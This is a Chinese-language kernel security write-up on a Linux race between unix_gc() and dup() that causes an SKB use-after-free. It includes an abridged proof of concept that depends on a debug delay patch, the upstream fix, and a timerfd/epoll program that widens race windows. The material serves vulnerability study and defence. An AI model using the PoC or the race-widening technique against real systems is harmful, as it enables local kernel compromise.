author: 熊潇 of IceSword Lab
概述 原文: Racing against the clock – hitting a tiny kernel race window
Part.1: 漏洞原理简述
Part.2: 对比较容易产生疑惑的地方增加了细节说明
Part.3: 针对文中提高 race 的技巧做了分析
Part.1 The bug & race
The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu()
/ get_file_rcu_many()
by __fget_files()
as long as the refcount is non-zero.
unix_gc()
的预期逻辑是: total_refs
和 inflight_refs
相同就可以认为此时 file
是单独占有的,就可以把 skb
和 file
一起 free 掉
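下面代码中,如果 unix_gc() 里对 total_refs 和 inflight_refs 的比较 (3) 恰好发生在 __fget_files() 的 files_lookup_fd_rcu() (1) 和 get_file_rcu_many() (2) 之间,则 race 成功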
如果 race 没有成功,__fget_files
那里就会发现 f_count
是 0 或者 file 是 NULL
但是如果 race 成功的话,file->f_count
在 __fget_files()
中会被加 1 ,在 unix_gc
后面的代码中就不会被释放 file
的内存,而只是把 f_count
减 1,这也意味着在 close()
之后依然可以 dup()
成功
1 2 3 4 5 6 7 8 9 10 11 12 13 dup() -> __fget_files() file = files_lookup_fd_rcu(files, fd); ... get_file_rcu_many(file, refs) close () -> unix_gc() list_for_each_entry_safe(u, next, &gc_inflight_list, link) { total_refs = file_count(u->sk.sk_socket->file); inflight_refs = atomic_long_read(&u->inflight); ... if (total_refs == inflight_refs) { list_move_tail(&u->link, &gc_candidates); ...
unix_gc() 中 file 和 skb 没有同步释放可能造成的影响?
下面这个方式可以触发 skb UAF:
1 2 3 4 5 6 socketpair() sendmsg(4 , 3 ) -> skb_queue_tail(&other->sk_receive_queue, skb); close (3 ) | dup(3 ) recvmsg(3 ) -> last = skb = skb_peek(&sk->sk_receive_queue);
skb uaf:
allocated in: sendmsg() -> unix_stream_sendmsg()
freed in: close() -> unix_gc()
uafed in: recvmsg() -> unix_stream_read_generic()
Part.2 SCM_RIGHTS unix socket
SCM_RIGHTS
is a socket control message used for passing file descriptors between processes over a UNIX domain socket.
It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.
example
sender.c
/*
 * sender.c - pass an open file descriptor to a peer process over a UNIX
 * domain stream socket using an SCM_RIGHTS control message.
 *
 * Usage: sender <file_path>
 *
 * Connects to /tmp/file_transfer.sock, sends the 5-byte payload "hello"
 * accompanied by a descriptor for <file_path>, then exits.
 * Exit status is 0 on success and 1 on any failure.
 */
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>

int main(int argc, char *argv[])
{
    int rc = 1;
    int sock = -1;
    int fd = -1;
    const char *file_path;
    struct sockaddr_un addr;
    char payload[] = "hello";
    struct iovec io = { .iov_base = payload, .iov_len = sizeof(payload) - 1 };
    struct msghdr msg = {0};
    struct cmsghdr *cmsg;
    /*
     * Ancillary data buffer. The union forces the alignment required by
     * struct cmsghdr; a plain char array gives no such guarantee.
     */
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } control;

    if (argc < 2) {
        printf("Usage: %s <file_path>\n", argv[0]);
        return 1;
    }
    file_path = argv[1];

    sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        goto out;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    /* addr is zeroed and one byte is held back, so sun_path stays NUL-terminated. */
    strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("connect");
        goto out;
    }

    fd = open(file_path, O_RDONLY);
    if (fd == -1) {
        perror("open");
        goto out;
    }

    memset(&control, 0, sizeof(control));
    msg.msg_iov = &io;
    msg.msg_iovlen = 1;
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
    /* CMSG_DATA() is not guaranteed to be suitably aligned for int: copy the bytes. */
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));

    if (sendmsg(sock, &msg, 0) == -1) {
        perror("sendmsg");
        goto out;
    }

    rc = 0;

out:
    /* Single exit path so neither descriptor leaks on failure. */
    if (fd != -1)
        close(fd);
    if (sock != -1)
        close(sock);
    return rc;
}
recver.c
/*
 * recver.c - receive a file descriptor over a UNIX domain stream socket
 * (SCM_RIGHTS) and copy the contents of the received file to stdout.
 *
 * Binds and listens on /tmp/file_transfer.sock, accepts one connection,
 * reads one message with its ancillary data, then dumps the file.
 * Exit status is 0 on success and 1 on any failure.
 */
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>

int main(int argc, char *argv[])
{
    int rc = 1;
    int sock = -1;
    int client_sock = -1;
    int fd = -1;
    int bound = 0;
    struct sockaddr_un addr;
    char buf[256];
    struct iovec io = { .iov_base = buf, .iov_len = sizeof(buf) };
    struct msghdr msg = { .msg_iov = &io, .msg_iovlen = 1 };
    struct cmsghdr *cmsg;
    char buf2[256];
    ssize_t bytes_read;
    /* The union forces the alignment struct cmsghdr needs. */
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } control;

    (void)argc;
    (void)argv;

    sock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        goto out;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    /* addr is zeroed and one byte is held back, so sun_path stays NUL-terminated. */
    strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);

    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("bind");
        goto out;
    }
    bound = 1;

    if (listen(sock, 1) == -1) {
        perror("listen");
        goto out;
    }

    client_sock = accept(sock, NULL, NULL);
    if (client_sock == -1) {
        perror("accept");
        goto out;
    }

    memset(&control, 0, sizeof(control));
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    if (recvmsg(client_sock, &msg, 0) == -1) {
        perror("recvmsg");
        goto out;
    }

    /* Accept only a SOL_SOCKET/SCM_RIGHTS header large enough to hold one fd. */
    cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL ||
        cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS ||
        cmsg->cmsg_len < CMSG_LEN(sizeof(fd))) {
        printf("Invalid message\n");
        goto out;
    }

    /* CMSG_DATA() is not guaranteed to be suitably aligned for int: copy the bytes. */
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(fd));
    if (fd == -1) {
        /* errno is not meaningful here, so do not use perror(). */
        fprintf(stderr, "No file descriptor received\n");
        goto out;
    }

    /*
     * read() does not NUL-terminate, so write exactly the bytes that were
     * returned instead of formatting the buffer with "%s".
     */
    while ((bytes_read = read(fd, buf2, sizeof(buf2))) > 0) {
        if (fwrite(buf2, 1, (size_t)bytes_read, stdout) != (size_t)bytes_read) {
            perror("fwrite");
            goto out;
        }
    }
    if (bytes_read == -1) {
        perror("read");
        goto out;
    }

    rc = 0;

out:
    if (fd != -1)
        close(fd);
    if (client_sock != -1)
        close(client_sock);
    if (sock != -1)
        close(sock);
    /* Remove the socket file this process created so a later run can bind again. */
    if (bound)
        unlink(addr.sun_path);
    return rc;
}
Unix socket sendmsg()
and recvmsg()
用于发送和接收 SCM_RIGHTS
unix socket 数据的主要处理函数是: unix_stream_sendmsg
和 unix_stream_read_generic
特殊的地方在于:
sendmsg
的时候会创建 skb
并放在全局列表 gc_inflight_list
和接收端的 sk_receive_queue
上
发送的 fd
对应的 file
会绑定到 skb
上(f_count
也会加 1)
recvmsg
的时候从 sk_receive_queue
取 skb
unix_gc
则从 gc_inflight_list
取 skb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec() -> unix_stream_sendmsg() **__scm_send()** scm_fp_copy() fget_raw(fd) ... __fget_files() other = unix_peer(sk); skb = sock_alloc_send_pskb() **unix_scm_to_skb()** unix_attach_fds() unix_inflight() list_add_tail(&u->link, &**gc_inflight_list**); **skb->destructor = unix_destruct_scm;** **** skb_queue_tail(&other->**sk_receive_queue**, skb);
1 2 3 4 5 6 7 8 9 10 11 12 13 recvmsg() -> __sys_recvmsg() -> ... -> unix_stream_recvmsg() unix_stream_read_generic() last = skb = skb_peek(&sk->sk_receive_queue); scm_recv() scm_detach_fds() receive_fd_user() .. fd_install(new_fd, get_file(file)); __scm_destroy() fput() fput_many()
**struct sk_buff *skb
, struct unix_sock *u
, struct socket *sock
, struct sock *sk
和 struct file *file
之间的关系?**
1 2 3 4 5 6 7 8 9 struct socket *sock = &container_of (file ->f_inode , struct socket_alloc , vfs_inode )->socket struct sock *sk = sock ->sk struct unix_sock *u = (struct unix_sock *)sk struct file *file = u ->sk .sk_socket ->file struct file *file = (*(struct unix_skb_parms *)&((skb )->cb )).fp ->fp [i ]
unix_gc()
做了什么?
遍历 gc_inflight_list
获取 unix_sock
对象
把满足条件的 unix_sock
添加到 gc_candidates
条件:unix_sock
的文件引用和 skb
引用值相同
遍历 gc_candidates
释放 hitlist
上的 skb
内存和与之绑定的 struct file
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 unix_gc() struct sk_buff_head hitlist ; ... list_for_each_entry_safe(u, next, &gc_inflight_list, link) { total_refs = file_count(u->sk.sk_socket->file); inflight_refs = atomic_long_read(&u->inflight); if (total_refs == inflight_refs) { list_move_tail(&u->link, &gc_candidates); } ... skb_queue_head_init(&hitlist); list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, &hitlist); scan_inflight(&u->sk, func, hitlist); __skb_queue_tail(hitlist, skb); ... __skb_queue_purge(&hitlist); kfree_skb(skb);
unix_gc() 中 file 和 skb 在哪里 free ?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 unix_gc() ... skb_queue_head_init(&hitlist); list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, NULL ); scan_inflight(&u->sk, func, hitlist); __skb_queue_tail(hitlist, skb); ... __skb_queue_purge(&hitlist); kfree_skb(skb); ... **skb->destructor() unix_destruct_scm()** scm_destroy() __scm_destroy() **fput() kfree_skbmem() **kmem_cache_free(.., skb) sendmsg() __sys_sendmsg() sock_sendmsg() sock_sendmsg_nosec() unix_stream_sendmsg() skb = sock_alloc_send_pskb() unix_scm_to_skb() **skb->destructor = unix_destruct_scm;**
unix_gc()
何时被调用?
close()
可以间接触发
具体入口是 syscall_exit_to_user_mode() -> task_work_run() -> __fput()
sendmsg()
也可以触发但只在队列满的时候
sendmsg() - wait_for_unix_gc()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 close () close_fd() filp_close() fput() fput_many(file, 1 ); atomic_long_sub_and_test(refs, &file->f_count) init_task_work(&file->f_u.fu_rcuhead, ____fput) task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME) entry_SYSCALL_64 do_syscall_64 syscall_exit_to_user_mode ... tracehook_notify_resume task_work_run() __fput() sock_close() __sock_release() unix_release() unix_release_sock() **unix_gc()**
1 2 3 4 5 6 7 sendmsg() ... unix_stream_sendmsg()/unix_dgram_sendmsg() wait_for_unix_gc() if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress) **unix_gc();**
dup() 的作用和实现原理?
根据 fd 从 fd table 中获取 struct file *file
如果 f_count
不为 0 则 file->f_count += 1
fd table 中新建一个条目指向 file
1 2 3 4 5 6 7 8 9 SYSCALL_DEFINE1(dup, unsigned int , fildes) fget_raw() __fget(fd, FMODE_PATH, 1 ) __fget_files(current->files, fd, mask, refs) file = files_lookup_fd_rcu(files, fd); get_file_rcu_many(file, refs) atomic_long_add_unless(&(x)->f_count, (cnt), 0 ) get_unused_fd_flags() fd_install()
close()
的作用和实现原理?
使 fd 重新可用
把 fd table 中 fd 对应的条目删除(设置为 NULL)
fd table 中原来指向的 struct file
的 f_count
减 1,如果减到 0 则释放 struct file 的内存
close
不一定会立马释放 struct file
, 但是用户态不能再访问该 fd
,比如dup(fd)
,read(fd)
..
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 close () close_fd() pick_file() fdt = files_fdtable(files); file = fdt->fd[fd]; **rcu_assign_pointer(fdt->fd[fd], NULL ); __put_unused_fd(files, fd); filp_close() **fput()** fput_many(file, 1 ); atomic_long_sub_and_test(refs, &file->f_count) **init_task_work(&file->f_u.fu_rcuhead, ____fput)** task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME) ____fput() __fput() file_free() file_free_rcu() **kmem_cache_free(filp_cachep, f)
增加 kernel delay patch 的 poc 如何 work ?
line-27 将 pair[0] f_count +1 并添加到 gc_inflight_list
和 sk_receive_queue
line-29 和 line-43 用于触发 unix_gc()
调用, 因为需要一个 f_count
为 1 的 fd
被 close()
line-36 用于等待 resurrect_fn()->dup()->__fget_files()
调用进入 race window 拿到 struct file
, 因为 line-37 会把 pair[0]
从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms
line-43 会在 __fget_files()
等待的期间执行 unix_gc()
, 在执行到准备释放 skb 的代码时,会等待 line-11 的 dup() 完成。
dup()
完成后执行到 line-16 的 recvmsg()
,内核会等待 line-43 触发的 unix_gc()
完成 skb 的释放
unix_gc()
完成后,recvmsg()
继续执行拿到被释放的 skb,UAF
省略版 POC :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 1 void send_fd (int sock, int fd) {2 ...3 sendmsg(sock, &msg, 0 );4 }5 6 int resurrect_fd = -1 ;7 int resurrected_fd = -1 ;8 9 void *resurrect_fn (void *arg) {10 prctl(PR_SET_NAME, "SLOW-ME" ); 11 resurrected_fd = dup(resurrect_fd);12 prctl(PR_SET_NAME, "resurrect" );13 14 prctl(PR_SET_NAME, "SLOW-RECV" );15 ...16 int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);17 prctl(PR_SET_NAME, "resurrect" );18 19 return NULL ;20 }21 22 int main (void ) {23 24 int pair[2 ];25 socketpair(AF_UNIX, SOCK_STREAM, 0 , pair);26 27 send_fd(pair[1 ], pair[0 ]);28 29 int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0 );30 31 resurrect_fd = pair[0 ];32 33 pthread_t resurrect_thread;34 pthread_create(&resurrect_thread, NULL , resurrect_fn, NULL );35 36 usleep(100000 ); 37 close (pair[0 ]);38 39 43 close (trigger_sock);44 45 46 pthread_join(resurrect_thread, NULL );47 48 }
kernel patch 增加三个 mdelay
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 @@ -850 ,6 +852 ,13 @@ static struct file *__fget_files (struct files_struct *files , unsigned int fd , loop : file = files_lookup_fd_rcu(files, fd); if (file) { + if (strcmp (current->comm, "SLOW-ME" ) == 0 ) { + pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n" , + fd, (unsigned long )file, file_count(file)); **+ mdelay(500 );** + pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n" , + fd, (unsigned long )file, file_count(file)); + } ... @@ -2631 ,6 +2633 ,12 @@ static int unix_stream_read_generic (struct unix_stream_read_state *state, last = skb = skb_peek(&sk->sk_receive_queue); last_len = last ? last->len : 0 ; + if (strcmp (current->comm, "SLOW-RECV" ) == 0 ) { + pr_warn("recvmsg: delaying stream receive\n" ); + mdelay(500 ); + pr_warn("recvmsg: delayed stream receive\n" ); + } + ... @@ -210 ,8 +212 ,11 @@ void unix_gc(void ) ... skb_queue_head_init(&hitlist); + if (strcmp (current->comm, "resurrect" ) == 0 ) { + pr_warn("unix: delaying hitlist setup\n" ); + mdelay(500 ); + pr_warn("unix: hitlist setup delay done\n" ); + } list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, &hitlist);
fixed patch 如何 work ?
补丁效果:在 race window 期间,如果 fd 对应的 struct file
已经从 fd table 移除,则回退对 f_count
的操作,如果发现回退后变为 0 则直接释放 struct file
1 2 3 4 5 6 7 8 9 10 11 12 13 14 diff --git a/fs/file.c b/fs/file.c index 8627 dacfc4246..ad4a8bf3cf109 100644 --- a/fs/file.c +++ b/fs/file.c @@ -858 ,6 +858 ,10 @@ loop: file = NULL ; else if (!get_file_rcu_many(file, refs)) goto loop; + else if (files_lookup_fd_raw(files, fd) != file) { + fput_many(file, refs); + goto loop; + } } rcu_read_unlock();
Part.3 如何利用 hrtimer 扩大 race 成功率?
timerfd_create
+ timerfd_settime
可以在指定时间(纳秒)后触发 timer interrupt
timer interrupt handler 会调用 __wake_up_common
遍历 wait queue 并执行回调函数。这意味着 wait queue 越长,处在 interrupt context 的时间越长
利用这一点可以让进程在 race window 中被中断,然后在另一个 CPU 上运行需要与之 race 的进程
wait queue item 在哪里添加和读取 ?
每一个 EPOLL_CTL_ADD
会在 timer_fd 的 wait queue 上添加一个执行 ep_poll_callback
的 entry
在 timerfd_triggered
中 从 timer_fd 的 wait queue 中取出 entry
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 do_epoll_ctl() ep_insert(struct eventpoll *ep, .. struct ep_pqueue epq; init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); ep_item_poll(epi, &epq.pt, 1 ); vfs_poll timerfd_poll struct timerfd_ctx *ctx = file->private_data; poll_wait(file, &ctx->wqh, wait); **ep_ptable_queue_proc**(struct file *file, wait_queue_head_t *whead, poll_table *pt) struct epitem *epi = ep_item_from_epqueue(pt); struct eppoll_entry *pwq; ... pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL); ... **init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);** ... **add_wait_queue(whead, &pwq->wait); ... struct ep_pqueue { poll_table pt; struct epitem *epi; } struct poll_table_struct { poll_queue_proc _qproc; __poll_t _key; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 local_apic_timer_interrupt() **hrtimer_interrupt()** ... timerfd_tmrproc() **timerfd_triggered()** **spin_lock_irqsave(&ctx->wqh.lock, flags);** **** ctx->expired = 1 ; ctx->ticks++; wake_up_locked_poll(**&ctx->wqh**, EPOLLIN); **__wake_up_common() wait_queue_entry_t *curr, *next; **list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)** ret = curr->func(curr, mode, wake_flags, key); spin_unlock_irqrestore(&ctx->wqh.lock, flags);
**timerfd_tmrproc
在 timerfd_setup
中设置**
1 2 3 4 5 6 static int timerfd_setup (struct timerfd_ctx *ctx, int flags, const struct itimerspec64 *ktmr) .. hrtimer_init(&ctx->t.tmr, clockid, htmode); hrtimer_set_expires(&ctx->t.tmr, texp); ctx->t.tmr.function = timerfd_tmrproc;
**struct timerfd_ctx
, struct file
, struct hrtimer
之间的关系**
1 2 3 4 5 struct timerfd_ctx *ctx = file ->private_data ;struct hrtimer *htmr = &ctx ->t .tmr ;struct timerfd_ctx *ctx = container_of (htmr , struct timerfd_ctx , t .tmr );
测试代码:
向 wait queue 中添加 500 * 500 个 entry
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 #define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/epoll.h> #include <sys/timerfd.h> #include <sched.h> #include <err.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1 ) \ err(1 , "SYSCHK(" #x ")" ); \ __res; \ }) #define NUM_EPOLL_INSTANCES 500 #define NUM_DUP_FDS 500 #define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS) #define NSEC_PER_SEC 1000000000UL void pin_task_to (int pid, int cpu) { cpu_set_t cset; CPU_ZERO(&cset); CPU_SET(cpu, &cset); SYSCHK(sched_setaffinity(pid, sizeof (cpu_set_t ), &cset)); } void pin_to (int cpu) { pin_task_to(0 , cpu); }struct timespec get_mono_time (void ) { struct timespec ts ; clock_gettime(CLOCK_MONOTONIC, &ts); return ts; } void ts_add (struct timespec *ts, unsigned long nsecs) { ts->tv_nsec += nsecs; if (ts->tv_nsec >= NSEC_PER_SEC) { ts->tv_sec++; ts->tv_nsec -= NSEC_PER_SEC; } } int main () { pin_to(0 ); int timerfd = timerfd_create(CLOCK_MONOTONIC, 0 ); if (timerfd < 0 ) { perror("timerfd_create" ); return 1 ; } int epoll_fds[NUM_EPOLL_INSTANCES]; for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { epoll_fds[i] = epoll_create1(0 ); if (epoll_fds[i] < 0 ) { perror("epoll_create1" ); return 1 ; } } int timer_fds[NUM_DUP_FDS]; for (int i = 0 ; i < NUM_DUP_FDS; i++) { timer_fds[i] = dup(timerfd); if (timer_fds[i] < 0 ) { perror("dup" ); return 1 ; } } struct epoll_event ev = { 0 }; ev.events = EPOLLIN; for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { for (int j = 0 ; j < NUM_DUP_FDS; j++) { ev.data.fd = timer_fds[j]; if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], 
&ev) < 0 ) { perror("epoll_ctl" ); return 1 ; } } } struct timespec base_time = get_mono_time (); struct itimerspec timer_value = { .it_value = base_time }; ts_add(&timer_value.it_value, 1000 * 1000 * 1000 ); if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL ) < 0 ) { perror("timerfd_settime" ); return 1 ; } for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { int nfds = epoll_wait(epoll_fds[i], &ev, 1 , -1 ); if (nfds < 0 ) { perror("epoll_wait" ); return 1 ; } } unsigned long value; read (timerfd, &value, sizeof (value)) == sizeof (value); printf ("value: %ld\n" , value); for (int i = 0 ; i < NUM_EPOLL_INSTANCES; i++) { close (epoll_fds[i]); } for (int i = 0 ; i < NUM_DUP_FDS; i++) { close (timer_fds[i]); } close (timerfd); return 0 ; }
如何观测延迟效果?
在 GDB 中可以查看队列中的 entry,数量与设置的一致
b timerfd_triggered
set $head = &ctx.wqh.head
set $node = $head
while $node.next != $head
p $node.next
set $node = $node.next
end
p *$head
加一点 patch 用 rdtsc
可以粗略测量一下延迟效果
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 **0xffffffff81b8b67e <+49 >: rdtsc** 0xffffffff81b8b680 <+51 >: shl rdx,0x20 0xffffffff81b8b684 <+55 >: or rax,rdx0xffffffff81b8b687 <+58 >: lea r12,[rbx+0x88 ]0xffffffff81b8b68e <+65 >: mov r14,rax0xffffffff81b8b691 <+68 >: mov rdi,r120xffffffff81b8b694 <+71 >: call 0xffffffff81bde9d0 <_raw_spin_lock_irqsave>0xffffffff81b8b699 <+76 >: inc QWORD PTR [rbx+0xa0 ]0xffffffff81b8b6a0 <+83 >: mov edx,0x1 0xffffffff81b8b6a5 <+88 >: mov rdi,r120xffffffff81b8b6a8 <+91 >: mov WORD PTR [rbx+0xac ],0x1 0xffffffff81b8b6b1 <+100 >: mov r13,rax0xffffffff81b8b6b4 <+103 >: mov esi,0x3 0xffffffff81b8b6b9 <+108 >: call 0xffffffff810ad650 <__wake_up_locked_key>0xffffffff81b8b6be <+113 >: mov rsi,r130xffffffff81b8b6c1 <+116 >: mov rdi,r120xffffffff81b8b6c4 <+119 >: call 0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>**0xffffffff81b8b6c9 <+124 >: rdtsc**
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 diff --git a/fs/timerfd.c b/fs/timerfd.c index e9c96a0c79f1..b919b24b4d48 100644 --- a/fs/timerfd.c +++ b/fs/timerfd.c @@ -64 ,11 +64 ,20 @@ static void timerfd_triggered (struct timerfd_ctx *ctx) { unsigned long flags; + u64 start_time, end_time; + + pr_warn("[%s] %s enter\n" , current->comm, __func__); + + asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0" + : "=a" (start_time) :: "%rdx" ) ; spin_lock_irqsave(&ctx->wqh.lock, flags); ctx->expired = 1 ; ctx->ticks++; wake_up_locked_poll(&ctx->wqh, EPOLLIN); spin_unlock_irqrestore(&ctx->wqh.lock, flags); + asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0" + : "=a" (end_time) :: "%rdx" ) ;+ pr_warn("[%s] %s exit, %lld\n" , current->comm, __func__, end_time - start_time); }
系统正常运行的时候 tick 数大概在 3000 ~ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3~4 个数量级(测试虚拟机的CPU是单核 2000 MHz)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [ 1134.053250 ] [swapper/0 ] timerfd_triggered exit , 2976 [ 1134.053250 ] [swapper/0 ] timerfd_triggered enter [ 1134.053250 ] [swapper/0 ] timerfd_triggered exit , 3970 [ 1134.552271 ] [swapper/0 ] timerfd_triggered enter [ 1134.552906 ] [swapper/0 ] timerfd_triggered exit , 11616 [ 1175.552958 ] [swapper/0 ] timerfd_triggered enter [ 1175.553871 ] [swapper/0 ] timerfd_triggered exit , 32663 [ 1176.052796 ] [swapper/0 ] timerfd_triggered enter [ 1176.053719 ] [swapper/0 ] timerfd_triggered exit , 29340 [ 1184.738834 ] [swapper/0 ] timerfd_triggered enter **[ 1184.739757 ] [swapper/0 ] timerfd_triggered exit , 27116541 ...** [ 1588.076916 ] [swapper/0 ] timerfd_triggered enter **[ 1588.077841 ] [swapper/0 ] timerfd_triggered exit , 28924883 ...** [ 1596.735608 ] [swapper/0 ] timerfd_triggered enter **[ 1596.736503 ] [swapper/0 ] timerfd_triggered exit , 28029898 .. [ 1222.384483 ] [swapper/0 ] timerfd_triggered enter **[ 1222.385381 ] [swapper/0 ] timerfd_triggered exit , 8511668 ... [ 1265.026284 ] [swapper/0 ] timerfd_triggered enter **[ 1265.027208 ] [swapper/0 ] timerfd_triggered exit , 1202548
一种观测代码被中断位置的方法 原文的附录:
I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register
代码实现:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <string.h> #include <ucontext.h> #include <sys/time.h> #include <sys/user.h> #include <time.h> #include <sched.h> #include <err.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1 ) \ err(1 , "SYSCHK(" #x ")" ); \ __res; \ }) void pin_task_to (int pid, int cpu) { cpu_set_t cset; CPU_ZERO(&cset); CPU_SET(cpu, &cset); SYSCHK(sched_setaffinity(pid, sizeof (cpu_set_t ), &cset)); } void pin_to (int cpu) { pin_task_to(0 , cpu); }void timer_handler (int signum, siginfo_t *info, void *context) { ucontext_t *ucontext = (ucontext_t *) context; void *pc = (void *) ucontext->uc_mcontext.gregs[REG_RIP]; long rax = ucontext->uc_mcontext.gregs[REG_RAX]; printf ("Timer fired, PC = %p, rax: %ld\n" , pc, rax); } int main () { pin_to(0 ); struct sigaction sa ; memset (&sa, 0 , sizeof (sa)); sa.sa_flags = SA_SIGINFO; sa.sa_sigaction = timer_handler; sigaction(SIGALRM, &sa, NULL ); struct itimerspec its ; its.it_interval.tv_sec = 0 ; its.it_interval.tv_nsec = 10000000 ; its.it_value = its.it_interval; timer_t timerid; timer_create(CLOCK_MONOTONIC, NULL , &timerid); timer_settime(timerid, 0 , &its, NULL ); volatile int i; while (1 ) { __asm__ volatile ( "mov $1, %%rax\n\t" "mov $2, %%rax\n\t" "mov $3, %%rax\n\t" "mov $4, %%rax\n\t" "mov $5, %%rax\n\t" "mov $6, %%rax\n\t" "mov $7, %%rax\n\t" "mov $8, %%rax\n\t" "mov $9, %%rax\n\t" "mov $10, %%rax\n\t" : : : "%rax" ) ; } return 0 ; }